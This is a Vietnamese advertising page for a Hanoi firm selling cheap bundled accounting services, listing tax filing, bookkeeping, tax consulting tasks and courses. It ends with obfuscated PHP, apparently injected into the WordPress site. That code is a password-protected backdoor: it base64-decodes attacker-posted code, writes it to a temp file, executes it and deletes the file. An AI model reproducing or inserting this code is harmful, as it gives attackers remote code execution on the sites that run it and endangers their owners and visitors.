1

Công ty làm dịch vụ kế toán trọn gói giá rẻ tại Hà Nội

HỌC KÈM RIÊNG KẾ TOÁN 1-1 xem ngay

LỚP HỌC KẾ TOÁN NỘI BỘ CẤP TỐC xem ngay

LỚP KẾ TOÁN CHO NGƯỜI MỚI BẮT ĐẦU xem ngay

DỊCH VỤ KẾ TOÁN TRỌN GÓI

CÔNG TY LÀM DỊCH VỤ KẾ TOÁN TRỌN GÓI GIÁ RẺ

    Công ty làm dịch vụ kế toán trọn gói giá rẻ tại Hà Nội luôn mang lại niềm tin uy tín và chất lượng đảm bảo cho mọi doanh nghiệp vững bước thị trường. Công ty được thành lập và phát triển cung cấp dịch vụ kế toán trọn gói theo đúng quy định của Pháp Luật nhà nước hiện hành.

dich-vu-ke-toan-tron-goi

    Kế toán trọn gói là toàn bộ công việc của kế toán viên tại doanh nghiệp được Công ty làm dịch vụ kế toán Hà Nội thực hiện. Công ty chúng tôi luôn mang lại cho tất cả cả doanh nghiệp một niềm tin vững trãi, công ty giải quyết thực hiện tất cả các công việc của một doanh nghiệp như: làm sổ sách, kế toán thuế, quyết toán thuế, khai báo thuế, báo cáo thuế, giải thể công ty, thành lập doanh nghiệp, làm báo cáo tài chính … tất cả các công việc của một doanh nghiệp cần.

– Với đội ngũ cán bộ kế toán viên, kế toán trưởng lành nghề, có tâm huyết với nghề với công việc sẽ mang lại niềm tin uy tín cho mỗi doanh nghiệp. Chúng tôi có những chuyên gia tư vấn về thuế có nhiều năm kinh nghiệm trong tổng cục thuế, kế toán trưởng sẽ bảo đảm lợi ích cao nhất cho doanh nghiệp các bạn. Sử dụng dịch vụ kế toán trọn gói của Công Ty Kế Toán Hà Nội các bạn hoàn toàn yên tâm về chất lượng. Đội ngũ nhân sự chuyên nghiệp am hiểu sâu sắc vững vàng về nghiệp vụ chuyên môn luôn nhiệt tình tận tâm với khách hàng.

Dịch vụ kế toán trọn gói ở Hà Nội được đội ngũ cán bộ nhân viên thực hiện theo quy định chặt chẽ. Sau khi kết thúc công việc và bàn giao cho khách hàng đều được rà soát kiểm tra kỹ lưỡng bởi Kiểm Toán viên và các Kế Toán Trưởng. Đảm bảo dịch vụ kế toán trọn gói khi bàn giao cho khách hàng được chính xác và luôn theo đúng quy định của Pháp Luật.

CÔNG VIỆC CỦA DỊCH VỤ KẾ TOÁN TRỌN GÓI

 1. Khai thuế:
 • Khai thuế môn bài hàng năm
 • Lập báo cáo thuế gửi cho cơ quan thuế hàng tháng
 • Lập báo cáo thuế thu nhập doanh nghiệp
 • Lập báo cáo thuế thu nhập cá nhân
 • Lập báo cáo quyết toán các loại thuế khác có liên quan
 • Thông báo cho doanh nghiệp số tiền thuế phải nộp khi phát sinh
 1. Công việc của kế toán viên:
 • Kiểm tra chứng từ đầu vào, đầu ra cho phù hợp với quy định pháp luật
 • Phân loại, sắp xếp, đóng chứng từ kế toán
 • Định khoản các nghiệp vụ phát sinh
 • Thực hiện hạch toán, ghi sổ chứng từ, các giao dịch theo quy định
 • Lập in các loại sổ sách kế toán theo quy định
 1. Tư vấn và giải trình thuế:
 • Tư vấn kế toán thuế và hóa đơn chứng từ theo nội dung phạm vi công việc
 • Hỗ trợ tư vấn về lao động, BHXH, BHYT
 • Làm việc với cơ quan thuế khi có yêu cầu
 • Làm việc với công ty kiểm toán
 • Làm việc và giải trình với cơ quan thuế trong phạm vi công việc

4.  Giao nhận chứng từ và nộp báo cáo:

 • Nhận chứng từ từ khách hàng
 • Nộp báo cáo thuế cho cơ quan thuế

LỢI ÍCH MÀ CÔNG TY KẾ TOÁN HÀ NỘI MANG LẠI

Dịch vụ kế toán trọn gói của công ty cung cấp và mang lại báo cáo cho khách hàng một cách chính xác kịp thời theo đúng thời hạn hợp đồng mang lại niềm tin uy tín cho khách hàng. Với mức phí phải chăng thì Công Ty chúng tôi luôn là lựa chọn hàng đầu cho các doanh nghiệp, chúng tôi luôn đồng hành cùng các doanh nghiệp trên mỗi bước đường, luôn hỗ trợ tư vấn khách hàng tốt nhất và hiệu quả nhất cho doanh nghiệp luôn luôn phát triển.

CÔNG TY LÀM DỊCH VỤ KẾ TOÁN LÀ NIỀM TIN CỦA MỌI NGƯỜI

Mọi chi tiết xin liên hệ 24/24 để được tư vấn tốt nhất: 0973 761 751 – MR NGỌC

LỚP KẾ TOÁN NỘI BỘ ONLINE xem ngay

LỚP TIN HỌC VĂN PHÒNG CẤP TỐC xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

LỚP KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆP xem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Subscribe
  Notify of
  guest

  0 Comments
  Inline Feedbacks
  View all comments
  0
  Would love your thoughts, please comment.x
  ()
  x
  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}